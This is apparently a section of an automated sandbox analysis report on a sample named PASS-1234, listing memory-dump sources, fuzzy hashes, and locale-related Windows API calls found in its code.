          • Source File: 00000000.00000002.1660951225.0000000000D0F000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true
          • Associated: 00000000.00000002.1660931994.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1660951225.0000000000D01000.00000020.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1660951225.0000000000D0B000.00000020.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1660951225.0000000000DAB000.00000020.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661073695.0000000000DB3000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661098394.0000000000DC7000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661147881.0000000000E12000.00000040.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661170625.0000000000E22000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661188825.0000000000E23000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661205992.0000000000E24000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661223889.0000000000E26000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661223889.0000000000E28000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_d00000_PASS-1234.jbxd
          Similarity
          • API ID:
          • String ID: 0
          • API String ID: 0-4108050209
          • Opcode ID: 05206eb01700e287f4b4d3f868f1264d3cca09075b42347d9f5e0da6393ac761
          • Instruction ID: 39f1246f9abfdf8c76781c21ff8dc986769d0d2ae208427afe9f348442e5aa3b
          • Opcode Fuzzy Hash: 05206eb01700e287f4b4d3f868f1264d3cca09075b42347d9f5e0da6393ac761
          • Instruction Fuzzy Hash: F4B1C27090064A8BCB26CE68C451BBFB7B5EF44304F18861EE59AA7291E731DD41CF72
          Uniqueness

          Uniqueness Score: -1.00%

          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.1660951225.0000000000D0F000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true
          • Associated: 00000000.00000002.1660931994.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1660951225.0000000000D01000.00000020.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1660951225.0000000000D0B000.00000020.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1660951225.0000000000DAB000.00000020.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661073695.0000000000DB3000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661098394.0000000000DC7000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661147881.0000000000E12000.00000040.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661170625.0000000000E22000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661188825.0000000000E23000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661205992.0000000000E24000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661223889.0000000000E26000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661223889.0000000000E28000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_d00000_PASS-1234.jbxd
          Similarity
          • API ID:
          • String ID: 0
          • API String ID: 0-4108050209
          • Opcode ID: 144685cb0a147f04597dc85e80a8885193fd9dc4e7224e7405f7a4a06d3b07f6
          • Instruction ID: cfdbe9b7a090d1b1f523754981d9207bd495905bb0774d8206410b1eef5862b6
          • Opcode Fuzzy Hash: 144685cb0a147f04597dc85e80a8885193fd9dc4e7224e7405f7a4a06d3b07f6
          • Instruction Fuzzy Hash: 9FB10670900F4A9BCB24CF68E4517BEB7A1EF05300F58861AD89A97299E7B0D941CB77
          Uniqueness

          Uniqueness Score: -1.00%

          APIs
          • EnumSystemLocalesW.KERNEL32(00D9B598,00000001), ref: 00D9B49C
          Memory Dump Source
          • Source File: 00000000.00000002.1660951225.0000000000D0F000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true
          • Associated: 00000000.00000002.1660931994.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1660951225.0000000000D01000.00000020.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1660951225.0000000000D0B000.00000020.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1660951225.0000000000DAB000.00000020.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661073695.0000000000DB3000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661098394.0000000000DC7000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661147881.0000000000E12000.00000040.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661170625.0000000000E22000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661188825.0000000000E23000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661205992.0000000000E24000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661223889.0000000000E26000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661223889.0000000000E28000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_d00000_PASS-1234.jbxd
          Similarity
          • API ID: EnumLocalesSystem
          • String ID:
          • API String ID: 2099609381-0
          • Opcode ID: 41d47446b2eae66a83b6e273cc7cc3fcf2bfee2a51137f8ec5e8a55e03464a95
          • Instruction ID: 3e1f6724c4a2544c2ac7a02f59cfea6efaf844fb2f1a8821ed699bf5abaf7430
          • Opcode Fuzzy Hash: 41d47446b2eae66a83b6e273cc7cc3fcf2bfee2a51137f8ec5e8a55e03464a95
          • Instruction Fuzzy Hash: 3511293A2003059FDF189F39D9916BAB791FF80768B1A442DE94687641D771B902DB50
          Uniqueness

          Uniqueness Score: -1.00%

          APIs
          • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,00D9B7B4,00000000,00000000,?), ref: 00D9BB65
          Memory Dump Source
          • Source File: 00000000.00000002.1660951225.0000000000D0F000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true
          • Associated: 00000000.00000002.1660931994.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1660951225.0000000000D01000.00000020.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1660951225.0000000000D0B000.00000020.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1660951225.0000000000DAB000.00000020.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661073695.0000000000DB3000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661098394.0000000000DC7000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661147881.0000000000E12000.00000040.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661170625.0000000000E22000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661188825.0000000000E23000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661205992.0000000000E24000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661223889.0000000000E26000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661223889.0000000000E28000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_d00000_PASS-1234.jbxd
          Similarity
          • API ID: InfoLocale
          • String ID:
          • API String ID: 2299586839-0
          • Opcode ID: 431f3c11ef3f116a4fa1f5f3eaec0d8736bc7c3f510ba695b8863a93172010ac
          • Instruction ID: 1f532a67d27a3f60afac4d9414edbc8725dbca7c66b6d5f97f720a0c02c62062
          • Opcode Fuzzy Hash: 431f3c11ef3f116a4fa1f5f3eaec0d8736bc7c3f510ba695b8863a93172010ac
          • Instruction Fuzzy Hash: 49F0A936A00115ABDF245765D906BBA7798DB40778F1A042AED45A31C4DB74FD41C6B0
          Uniqueness

          Uniqueness Score: -1.00%

          APIs
          • EnumSystemLocalesW.KERNEL32(00D9B87F,00000001), ref: 00D9B535
          Memory Dump Source
          • Source File: 00000000.00000002.1660951225.0000000000D0F000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true
          • Associated: 00000000.00000002.1660931994.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1660951225.0000000000D01000.00000020.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1660951225.0000000000D0B000.00000020.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1660951225.0000000000DAB000.00000020.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661073695.0000000000DB3000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661098394.0000000000DC7000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661147881.0000000000E12000.00000040.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661170625.0000000000E22000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661188825.0000000000E23000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661205992.0000000000E24000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661223889.0000000000E26000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661223889.0000000000E28000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_d00000_PASS-1234.jbxd
          Similarity
          • API ID: EnumLocalesSystem
          • String ID:
          • API String ID: 2099609381-0
          • Opcode ID: b5a35eef292efcc42e78b768b5933cc3a81e8cfd2a5bfda46fa83ff5e9848d28
          • Instruction ID: 227a14b05fb2d3f3bf29f1767e1a15636106afcb69e83131298644b07c23f471
          • Opcode Fuzzy Hash: b5a35eef292efcc42e78b768b5933cc3a81e8cfd2a5bfda46fa83ff5e9848d28
          • Instruction Fuzzy Hash: 8BF0F6763003045FDF246F35A881A7A7B95FF80778F0B442EF9458B690D771AC02C620
          Uniqueness

          Uniqueness Score: -1.00%

          APIs
          • EnumSystemLocalesW.KERNEL32(Function_00089F09,00000001,00DC6140,0000000C), ref: 00D89F57
          Memory Dump Source
          • Source File: 00000000.00000002.1660951225.0000000000D0F000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true
          • Associated: 00000000.00000002.1660931994.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1660951225.0000000000D01000.00000020.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1660951225.0000000000D0B000.00000020.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1660951225.0000000000DAB000.00000020.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661073695.0000000000DB3000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661098394.0000000000DC7000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661147881.0000000000E12000.00000040.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661170625.0000000000E22000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661188825.0000000000E23000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661205992.0000000000E24000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661223889.0000000000E26000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661223889.0000000000E28000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_d00000_PASS-1234.jbxd
          Similarity
          • API ID: EnumLocalesSystem
          • String ID:
          • API String ID: 2099609381-0
          • Opcode ID: 0ab8638f529d5a04bb8e239544e969bd74b9e315f387ed00d101e09f21561523
          • Instruction ID: 0d8524f99ce40f3848046c4d4eb8c2ea32955f247b1deae9d98b7d21f7dfa9d7
          • Opcode Fuzzy Hash: 0ab8638f529d5a04bb8e239544e969bd74b9e315f387ed00d101e09f21561523
          • Instruction Fuzzy Hash: 6DF04936A01200DFE718EFA9E946BAD77F1EB04721F04416AF515EB2E0DBB59906CF60
          Uniqueness

          Uniqueness Score: -1.00%

          APIs
          • GetLocaleInfoEx.KERNEL32(?,00000022,00000000,00000002), ref: 00D3DC38
          Memory Dump Source
          • Source File: 00000000.00000002.1660951225.0000000000D0F000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true
          • Associated: 00000000.00000002.1660931994.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1660951225.0000000000D01000.00000020.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1660951225.0000000000D0B000.00000020.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1660951225.0000000000DAB000.00000020.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661073695.0000000000DB3000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661098394.0000000000DC7000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661147881.0000000000E12000.00000040.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661170625.0000000000E22000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661188825.0000000000E23000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661205992.0000000000E24000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661223889.0000000000E26000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661223889.0000000000E28000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_d00000_PASS-1234.jbxd
          Similarity
          • API ID: InfoLocale
          • String ID:
          • API String ID: 2299586839-0
          • Opcode ID: 64dce9773115cc38ea86779d06d56995c5f3ff20c8961b071c99637d3c6eca8f
          • Instruction ID: 3d51505e2a18bb58e208d34e85616ed58b36787a5e4ff3c6862c5c9ab53cd236
          • Opcode Fuzzy Hash: 64dce9773115cc38ea86779d06d56995c5f3ff20c8961b071c99637d3c6eca8f
          • Instruction Fuzzy Hash: 38E0D873270204B6D7158BBDAD0FF6A779ED708709F044641F203E51C1DAE4CA00E671
          Uniqueness

          Uniqueness Score: -1.00%

          APIs
          • EnumSystemLocalesW.KERNEL32(00D9B2D8,00000001), ref: 00D9B3DF
          Memory Dump Source
          • Source File: 00000000.00000002.1660951225.0000000000D0F000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true
          • Associated: 00000000.00000002.1660931994.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1660951225.0000000000D01000.00000020.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1660951225.0000000000D0B000.00000020.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1660951225.0000000000DAB000.00000020.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661073695.0000000000DB3000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661098394.0000000000DC7000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661147881.0000000000E12000.00000040.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661170625.0000000000E22000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661188825.0000000000E23000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661205992.0000000000E24000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661223889.0000000000E26000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661223889.0000000000E28000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_d00000_PASS-1234.jbxd
          Similarity
          • API ID: EnumLocalesSystem
          • String ID:
          • API String ID: 2099609381-0
          • Opcode ID: d2c753df84b5f6ecd8a7ed9b0ca1d97ec7ba4ce80aa2b101cf14a3f30ce0fa9b
          • Instruction ID: 96ea86c5eb74a828857b314afc434499213c2bfa6535d9c46c7053ab7598384e
          • Opcode Fuzzy Hash: d2c753df84b5f6ecd8a7ed9b0ca1d97ec7ba4ce80aa2b101cf14a3f30ce0fa9b
          • Instruction Fuzzy Hash: ABF0E53A3002155BCF14AF7AE945A7E7F94EFC1720F0B405AFA098B291C771A842C770
          Uniqueness

          Uniqueness Score: -1.00%

          APIs
          • GetLocaleInfoW.KERNEL32(00000000,?,00000000,?,?,?), ref: 00D8AC9D
          Memory Dump Source
          • Source File: 00000000.00000002.1660951225.0000000000D0F000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true
          • Associated: 00000000.00000002.1660931994.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1660951225.0000000000D01000.00000020.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1660951225.0000000000D0B000.00000020.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1660951225.0000000000DAB000.00000020.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661073695.0000000000DB3000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661098394.0000000000DC7000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661147881.0000000000E12000.00000040.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661170625.0000000000E22000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661188825.0000000000E23000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661205992.0000000000E24000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661223889.0000000000E26000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661223889.0000000000E28000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_d00000_PASS-1234.jbxd
          Similarity
          • API ID: InfoLocale
          • String ID:
          • API String ID: 2299586839-0
          • Opcode ID: 99300686fe74baf5e3208453e0cc7a875dcfc0ff74b330d10dd9c576e51d540a
          • Instruction ID: 11b0842efd3b6f6d66864820bcae98a798dde9f4884217a3d3368d674b89ea44
          • Opcode Fuzzy Hash: 99300686fe74baf5e3208453e0cc7a875dcfc0ff74b330d10dd9c576e51d540a
          • Instruction Fuzzy Hash: B9E04F35505228BBDF223F65DC05FAE7F1AEF44760F044011FC4966261CB719D21ABB1
          Uniqueness

          Uniqueness Score: -1.00%

          APIs
          • EnumSystemLocalesW.KERNEL32(Function_00089F09,00000001), ref: 00D8A128
          Memory Dump Source
          • Source File: 00000000.00000002.1660951225.0000000000D0F000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true
          • Associated: 00000000.00000002.1660931994.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1660951225.0000000000D01000.00000020.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1660951225.0000000000D0B000.00000020.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1660951225.0000000000DAB000.00000020.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661073695.0000000000DB3000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661098394.0000000000DC7000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661147881.0000000000E12000.00000040.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661170625.0000000000E22000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661188825.0000000000E23000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661205992.0000000000E24000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661223889.0000000000E26000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661223889.0000000000E28000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_d00000_PASS-1234.jbxd
          Similarity
          • API ID: EnumLocalesSystem
          • String ID:
          • API String ID: 2099609381-0
          • Opcode ID: 763874ab8d743f17b727c6a99bc5235bfaadf6830925a5df77627ce8c37babd6
          • Instruction ID: 562e8be002a6d792c9ba8579169ee8ede409fe775c067fcc76880161d93d35be
          • Opcode Fuzzy Hash: 763874ab8d743f17b727c6a99bc5235bfaadf6830925a5df77627ce8c37babd6
          • Instruction Fuzzy Hash: 89D0A731506704AFE72C5F53FD0B9153BAAE740310B040025F4095A2B0EBB26457CA10
          Uniqueness

          Uniqueness Score: -1.00%

          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.1660951225.0000000000D0F000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true
          • Associated: 00000000.00000002.1660931994.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1660951225.0000000000D01000.00000020.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1660951225.0000000000D0B000.00000020.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1660951225.0000000000DAB000.00000020.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661073695.0000000000DB3000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661098394.0000000000DC7000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661147881.0000000000E12000.00000040.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661170625.0000000000E22000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661188825.0000000000E23000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661205992.0000000000E24000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661223889.0000000000E26000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661223889.0000000000E28000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_d00000_PASS-1234.jbxd
          Similarity
          • API ID:
          • String ID: GetSystemTimePreciseAsFileTime
          • API String ID: 0-595813830
          • Opcode ID: c150f606619231f16b637dad47ca44d28a43fd777334c3ea57a350506c15ab14
          • Instruction ID: 8431c7de28d5597a4c6ed0ae56467692b890f83124c3a801bb92abbfab483bfd
          • Opcode Fuzzy Hash: c150f606619231f16b637dad47ca44d28a43fd777334c3ea57a350506c15ab14
          • Instruction Fuzzy Hash: 38E0C2326C1328FF82203786AD06EDDBF99D740BB2B080022FB49A7140E5A10C15C3F5
          Uniqueness

          Uniqueness Score: -1.00%

          Memory Dump Source
          • Source File: 00000000.00000002.1661098394.0000000000DC7000.00000004.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true
          • Associated: 00000000.00000002.1660931994.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1660951225.0000000000D01000.00000020.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1660951225.0000000000D0B000.00000020.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1660951225.0000000000D0F000.00000020.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1660951225.0000000000DAB000.00000020.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661073695.0000000000DB3000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661147881.0000000000E12000.00000040.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661170625.0000000000E22000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661188825.0000000000E23000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661205992.0000000000E24000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661223889.0000000000E26000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661223889.0000000000E28000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_d00000_PASS-1234.jbxd
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: 53dc1b23a483c69a5e118a122658e34189c20b54ed2d474e9ee3d3aaf57dfb7d
          • Instruction ID: 28109f92e4e2880b775c66a49a087324bde99dffb1cf8de79aede937f04933a2
          • Opcode Fuzzy Hash: 53dc1b23a483c69a5e118a122658e34189c20b54ed2d474e9ee3d3aaf57dfb7d
          • Instruction Fuzzy Hash: 0A32AE702183498BD714CF18C990B6EBBE2FF85314F198A2CE6D18B391D775D949CBA2
          Uniqueness

          Uniqueness Score: -1.00%

          Memory Dump Source
          • Source File: 00000000.00000002.1660951225.0000000000D0F000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true
          • Associated: 00000000.00000002.1660931994.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1660951225.0000000000D01000.00000020.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1660951225.0000000000D0B000.00000020.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1660951225.0000000000DAB000.00000020.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661073695.0000000000DB3000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661098394.0000000000DC7000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661147881.0000000000E12000.00000040.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661170625.0000000000E22000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661188825.0000000000E23000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661205992.0000000000E24000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661223889.0000000000E26000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661223889.0000000000E28000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_d00000_PASS-1234.jbxd
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: 5d85a4ee78b3714b69b4dbc341c8daf37cf5fc9b144913cc76756e0b1bbc5692
          • Instruction ID: 8416b0c989d8776c6bbc8942f2206fedc1ef6075c83ed54f7bdac284c8e693a3
          • Opcode Fuzzy Hash: 5d85a4ee78b3714b69b4dbc341c8daf37cf5fc9b144913cc76756e0b1bbc5692
          • Instruction Fuzzy Hash: B2B108766007019BDF349F28CC92BB7B3A9EF44308F58456DE987C6584E671E981CB71
          Uniqueness

          Uniqueness Score: -1.00%

          Memory Dump Source
          • Source File: 00000000.00000002.1660951225.0000000000D0F000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true
          • Associated: 00000000.00000002.1660931994.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1660951225.0000000000D01000.00000020.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1660951225.0000000000D0B000.00000020.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1660951225.0000000000DAB000.00000020.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661073695.0000000000DB3000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661098394.0000000000DC7000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661147881.0000000000E12000.00000040.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661170625.0000000000E22000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661188825.0000000000E23000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661205992.0000000000E24000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661223889.0000000000E26000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661223889.0000000000E28000.00000002.00000001.01000000.00000003.sdmpDownload File
